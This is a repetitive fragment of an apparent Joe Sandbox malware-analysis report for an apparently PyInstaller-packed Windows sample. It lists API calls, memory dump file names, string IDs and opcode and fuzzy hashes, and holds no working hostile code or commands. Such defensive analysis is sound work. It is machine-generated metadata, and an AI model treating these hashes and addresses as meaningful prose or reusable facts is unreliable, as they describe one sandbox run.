                                                                                                                                                                                                  • Associated: 00000010.00000002.1551462787.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF710303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551594165.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                                                  • String ID: CONOUT$
                                                                                                                                                                                                  • API String ID: 3230265001-3130406586
                                                                                                                                                                                                  • Opcode ID: 274174309ff0e3cf7757a3f5c883333dff1858e51aae267b9afc88cc39a62d3b
                                                                                                                                                                                                  • Instruction ID: 0acf70eceb6296892ff7bf39ca9b479fd96fc484d89a55ea6fac557619474cd3
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 274174309ff0e3cf7757a3f5c883333dff1858e51aae267b9afc88cc39a62d3b
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6D11B921B18F4286E7519B02E85432AEAA0FB48FF4F800234EA1D57794DF7CF408C760
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(?,00000000,?,00007FF7102C39F2), ref: 00007FF7102C821D
                                                                                                                                                                                                  • K32EnumProcessModules.KERNEL32(?,00000000,?,00007FF7102C39F2), ref: 00007FF7102C827A
                                                                                                                                                                                                    • Part of subcall function 00007FF7102C86B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF7102C3FA4,00000000,00007FF7102C1925), ref: 00007FF7102C86E9
                                                                                                                                                                                                  • K32GetModuleFileNameExW.KERNEL32(?,00000000,?,00007FF7102C39F2), ref: 00007FF7102C8305
                                                                                                                                                                                                  • K32GetModuleFileNameExW.KERNEL32(?,00000000,?,00007FF7102C39F2), ref: 00007FF7102C8364
                                                                                                                                                                                                  • FreeLibrary.KERNEL32(?,00000000,?,00007FF7102C39F2), ref: 00007FF7102C8375
                                                                                                                                                                                                  • FreeLibrary.KERNEL32(?,00000000,?,00007FF7102C39F2), ref: 00007FF7102C838A
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1551419790.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551387449.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551462787.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF710303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551594165.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3462794448-0
                                                                                                                                                                                                  • Opcode ID: a6a3fb36dedf01dc407d01068d21ba79f730b9d247533213ec4f70efe0ab8627
                                                                                                                                                                                                  • Instruction ID: 31a49b861d1fb7d0be2e1656a41770f2dfc72d09d0950bcde8a7ba08e0bae8e0
                                                                                                                                                                                                  • Opcode Fuzzy Hash: a6a3fb36dedf01dc407d01068d21ba79f730b9d247533213ec4f70efe0ab8627
                                                                                                                                                                                                  • Instruction Fuzzy Hash: A341A362A29EC241EA30AB11A6002BABB94FF85BE4F845135DF5D57789DE7CF409C720
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FFEEE1E1C29
                                                                                                                                                                                                  • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FFEEE1E1C7B
                                                                                                                                                                                                  • FreeLibraryAndExitThread.API-MS-WIN-CORE-LIBRARYLOADER-L1-1-0 ref: 00007FFEEE1E1CBE
                                                                                                                                                                                                  • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FFEEE1E1CFF
                                                                                                                                                                                                  • ExitThread.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FFEEE1E1D07
                                                                                                                                                                                                    • Part of subcall function 00007FFEEE1D3A40: GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-1-0(?,?,00000000,00007FFEEE1D3484,?,?,?,00007FFEEE2139B1,?,?,?,?,00007FFEEE1D78EA,?,?,?), ref: 00007FFEEE1D3AB9
                                                                                                                                                                                                    • Part of subcall function 00007FFEEE1D3A40: TlsGetValue.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,?,00000000,00007FFEEE1D3484,?,?,?,00007FFEEE2139B1,?,?,?,?,00007FFEEE1D78EA,?,?,?), ref: 00007FFEEE20C59E
                                                                                                                                                                                                  • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 00007FFEEE21730D
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1552353019.00007FFEEE1C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFEEE1C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552320581.00007FFEEE1C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552452581.00007FFEEE275000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552509174.00007FFEEE2AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552536826.00007FFEEE2B2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ffeee1c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ErrorLast$ExitThread$AddressCloseFreeHandleLibraryProcValue
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1453037571-0
                                                                                                                                                                                                  • Opcode ID: 9385413610f64a6426c2931e4861a13ac1805e78321b1171aa409faccdf45293
                                                                                                                                                                                                  • Instruction ID: d6f16ce1a8332296b16b52b221e40e8e6bcff503323825174735e5e91aa67c71
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9385413610f64a6426c2931e4861a13ac1805e78321b1171aa409faccdf45293
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 47316520F0C65342FA285B74B55537C22965F897B0F17073AE9FE426F6DFACA8858243
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 00007FF7102C7B50: GetCurrentProcess.KERNEL32 ref: 00007FF7102C7B70
                                                                                                                                                                                                    • Part of subcall function 00007FF7102C7B50: OpenProcessToken.ADVAPI32 ref: 00007FF7102C7B83
                                                                                                                                                                                                    • Part of subcall function 00007FF7102C7B50: GetTokenInformation.ADVAPI32 ref: 00007FF7102C7BA8
                                                                                                                                                                                                    • Part of subcall function 00007FF7102C7B50: GetLastError.KERNEL32 ref: 00007FF7102C7BB2
                                                                                                                                                                                                    • Part of subcall function 00007FF7102C7B50: GetTokenInformation.ADVAPI32 ref: 00007FF7102C7BF2
                                                                                                                                                                                                    • Part of subcall function 00007FF7102C7B50: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF7102C7C0E
                                                                                                                                                                                                    • Part of subcall function 00007FF7102C7B50: CloseHandle.KERNEL32 ref: 00007FF7102C7C26
                                                                                                                                                                                                  • LocalFree.KERNEL32(?,00007FF7102C3814), ref: 00007FF7102C848C
                                                                                                                                                                                                  • LocalFree.KERNEL32(?,00007FF7102C3814), ref: 00007FF7102C8495
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1551419790.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551387449.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551462787.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF710303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551594165.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                  • String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
                                                                                                                                                                                                  • API String ID: 6828938-1529539262
                                                                                                                                                                                                  • Opcode ID: 795f95526d0a951be163d7ee57e77295e71c5006ab84a191c0455a0dace466c7
                                                                                                                                                                                                  • Instruction ID: c691b8a545713cfdc8bc3b1c3d3eb2e0949054d96e7363c580c61428885ced00
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 795f95526d0a951be163d7ee57e77295e71c5006ab84a191c0455a0dace466c7
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 25214121A18E4281F654BB10E5152EAAAA5FF847A0FC44035EA4D57796DF3CF84DC760
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00007FF7102D43FD,?,?,?,?,00007FF7102D979A,?,?,?,?,00007FF7102D649F), ref: 00007FF7102DA5E7
                                                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF7102D43FD,?,?,?,?,00007FF7102D979A,?,?,?,?,00007FF7102D649F), ref: 00007FF7102DA61D
                                                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF7102D43FD,?,?,?,?,00007FF7102D979A,?,?,?,?,00007FF7102D649F), ref: 00007FF7102DA64A
                                                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF7102D43FD,?,?,?,?,00007FF7102D979A,?,?,?,?,00007FF7102D649F), ref: 00007FF7102DA65B
                                                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF7102D43FD,?,?,?,?,00007FF7102D979A,?,?,?,?,00007FF7102D649F), ref: 00007FF7102DA66C
                                                                                                                                                                                                  • SetLastError.KERNEL32(?,?,?,00007FF7102D43FD,?,?,?,?,00007FF7102D979A,?,?,?,?,00007FF7102D649F), ref: 00007FF7102DA687
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1551419790.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551387449.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551462787.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF710303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551594165.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Value$ErrorLast
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2506987500-0
                                                                                                                                                                                                  • Opcode ID: 5dcac91248c0014d458aec840eea87d8b317a92cf5de5997ea3edf93bd94a031
                                                                                                                                                                                                  • Instruction ID: f129e391c2801b7840431ed6c2a0e6c07870378c41cd302f2166c758de3b3d37
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5dcac91248c0014d458aec840eea87d8b317a92cf5de5997ea3edf93bd94a031
                                                                                                                                                                                                  • Instruction Fuzzy Hash: C2116A22A0CE4286FEA57726964153EEA865F487B0FC84334E93E077D6DE2CFC094761
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1551419790.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551387449.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551462787.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF710303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551594165.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                                                                                                                                                                  • String ID: Unhandled exception in script
                                                                                                                                                                                                  • API String ID: 3081866767-2699770090
                                                                                                                                                                                                  • Opcode ID: a6e7d290dc67b0bb036b84f18c740492a81528deb91c8b42bdc3829a80364304
                                                                                                                                                                                                  • Instruction ID: e16cd90828a7366839e8d8f019176bf37a2c8210f47ea8b77c3bc0a4953d490a
                                                                                                                                                                                                  • Opcode Fuzzy Hash: a6e7d290dc67b0bb036b84f18c740492a81528deb91c8b42bdc3829a80364304
                                                                                                                                                                                                  • Instruction Fuzzy Hash: E9319572618E8289EB20EF61E8552FAB760FF897A4F840135EA4D47B55DF3CE508C710
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1551419790.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551387449.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551462787.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF710303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551594165.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Message$ByteCharMultiWide
                                                                                                                                                                                                  • String ID: %s%s: %s$Error$Error/warning (ANSI fallback)
                                                                                                                                                                                                  • API String ID: 1878133881-640379615
                                                                                                                                                                                                  • Opcode ID: 185a5ded7e4d76afdc6dde510c40398ff569d270283616bd23a067f5071c39f1
                                                                                                                                                                                                  • Instruction ID: 49c044f1bbff69d25bf06c21e31068de913e7e039e2977579727c86632218760
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 185a5ded7e4d76afdc6dde510c40398ff569d270283616bd23a067f5071c39f1
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 51219672628E8681E620AB10F4517EAA764FF84794F801136E68C13B99CF7CE649C760
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00007FFEEE25EEE8), ref: 00007FFEEE25D621
                                                                                                                                                                                                  • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,?,?,00007FFEEE25EEE8), ref: 00007FFEEE25D62D
                                                                                                                                                                                                    • Part of subcall function 00007FFEEE25D700: CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 00007FFEEE25D711
                                                                                                                                                                                                  • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,?,?,?,?,00007FFEEE25EEE8), ref: 00007FFEEE25D65F
                                                                                                                                                                                                  • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00007FFEEE25EEE8), ref: 00007FFEEE25D680
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1552353019.00007FFEEE1C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFEEE1C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552320581.00007FFEEE1C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552452581.00007FFEEE275000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552509174.00007FFEEE2AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552536826.00007FFEEE2B2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ffeee1c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                                                  • String ID: CONOUT$
                                                                                                                                                                                                  • API String ID: 3230265001-3130406586
                                                                                                                                                                                                  • Opcode ID: e8436ed983646b7741b880c1e310600c66f6064bdfef0de261db91b68aa38882
                                                                                                                                                                                                  • Instruction ID: 05ae602d8673c6ba05494e35f9d27ed04f01b9ac72e0c8ab3b583158f032ff4e
                                                                                                                                                                                                  • Opcode Fuzzy Hash: e8436ed983646b7741b880c1e310600c66f6064bdfef0de261db91b68aa38882
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 80114532A18A4282E7109F55F44436A73A0FB8CB99F174225DA8D47B28DFBCD8558B06
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1551419790.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551387449.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551462787.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551513938.00007FF710303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1551594165.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                  • API String ID: 4061214504-1276376045
                                                                                                                                                                                                  • Opcode ID: f1eb0c22b123c1cdb2873c61f44d146b1d21622817f8dd4d6a21f18b4a6e3d93
                                                                                                                                                                                                  • Instruction ID: d2ebc646bfd008d07da55a8bb9ba20a89be3e0408609e9c567d2c32719bff3f8
                                                                                                                                                                                                  • Opcode Fuzzy Hash: f1eb0c22b123c1cdb2873c61f44d146b1d21622817f8dd4d6a21f18b4a6e3d93
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 69F04F61A19F0282EA11AB24E45437A9B20AF867B1FD40635D96D467E4CF2CF44DC720
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1552353019.00007FFEEE1C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFEEE1C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552320581.00007FFEEE1C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552452581.00007FFEEE275000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552509174.00007FFEEE2AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552536826.00007FFEEE2B2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ffeee1c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                  • API String ID: 4061214504-1276376045
                                                                                                                                                                                                  • Opcode ID: c6102f14bd0e1dc4eb31f26872076cec08b0579beb4ca12afd9d0d1ba956034a
                                                                                                                                                                                                  • Instruction ID: ced053406d1b1b9d4fc41afe196a5af37e2c04e418553130540ef61c271b4298
                                                                                                                                                                                                  • Opcode Fuzzy Hash: c6102f14bd0e1dc4eb31f26872076cec08b0579beb4ca12afd9d0d1ba956034a
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4BF01DA1A1D64282EA548F65B8943792360AF8C744F53103AE58F851B8DFACE4C8C702
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00007FFEEE22ED0C
                                                                                                                                                                                                  • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00007FFEEE22EE2D
                                                                                                                                                                                                  • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00007FFEEE22EF43
                                                                                                                                                                                                  • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00007FFEEE22EFC9
                                                                                                                                                                                                  • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00007FFEEE22F097
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1552353019.00007FFEEE1C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFEEE1C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552320581.00007FFEEE1C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552452581.00007FFEEE275000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552509174.00007FFEEE2AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552536826.00007FFEEE2B2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ffeee1c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ByteCharMultiWide$Info
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1775632426-0
                                                                                                                                                                                                  • Opcode ID: 37aa3bd256a071d7114397c104d9f3dc587f8c0504604195be426d22ce84bd86
                                                                                                                                                                                                  • Instruction ID: 3350bc143013ff39f0135e30f98ea2a76caca33974171fcb3358b229d87a4b13
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 37aa3bd256a071d7114397c104d9f3dc587f8c0504604195be426d22ce84bd86
                                                                                                                                                                                                  • Instruction Fuzzy Hash: BDD1D111E0828242FB765E90B49037D66C1AF8D794F9B4236D9DC1ABF4DEEDED809207
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00007FFEEE1E2509), ref: 00007FFEEE1E257A
                                                                                                                                                                                                  • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00007FFEEE1E2509), ref: 00007FFEEE1E25A7
                                                                                                                                                                                                  • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00007FFEEE1E2509), ref: 00007FFEEE217555
                                                                                                                                                                                                  • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00007FFEEE1E2509), ref: 00007FFEEE217562
                                                                                                                                                                                                  • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00007FFEEE1E2509), ref: 00007FFEEE217599
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.1552353019.00007FFEEE1C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFEEE1C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552320581.00007FFEEE1C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552452581.00007FFEEE275000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552509174.00007FFEEE2AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000010.00000002.1552536826.00007FFEEE2B2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ffeee1c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: FullNamePath$ErrorLast
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 457693415-0
                                                                                                                                                                                                  • Opcode ID: 8d511332f94ab66b54b28a8ebd2e96d388545995aa5be56feb9ca80927fc0617
                                                                                                                                                                                                  • Instruction ID: 686948ec070aa7e3f49f7b3c88420423151e44a6c6d15a8183399d540d3c15cb
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8d511332f94ab66b54b28a8ebd2e96d388545995aa5be56feb9ca80927fc0617
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 54318061F0870286FB14AFA1B4106BC32A4AF88B84B174136DD8D537B5DFBCE5418342
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 00007FFEEE1E18DC: GetModuleHandleExW.API-MS-WIN-CORE-LIBRARYLOADER-L1-1-0(?,?,?,00007FFEEE1E1868), ref: 00007FFEEE1E1920
                                                                                                                                                                                                  • CreateThread.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FFEEE1E4F8A
                                                                                                                                                                                                  • ResumeThread.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FFEEE1E4FA3
                                                                                                                                                                                                  • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FFEEE218369
                                                                                                                                                                                                  • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 00007FFEEE218385
                                                                                                                                                                                                  • FreeLibrary.API-MS-WIN-CORE-LIBRARYLOADER-L1-1-0 ref: 00007FFEEE218394
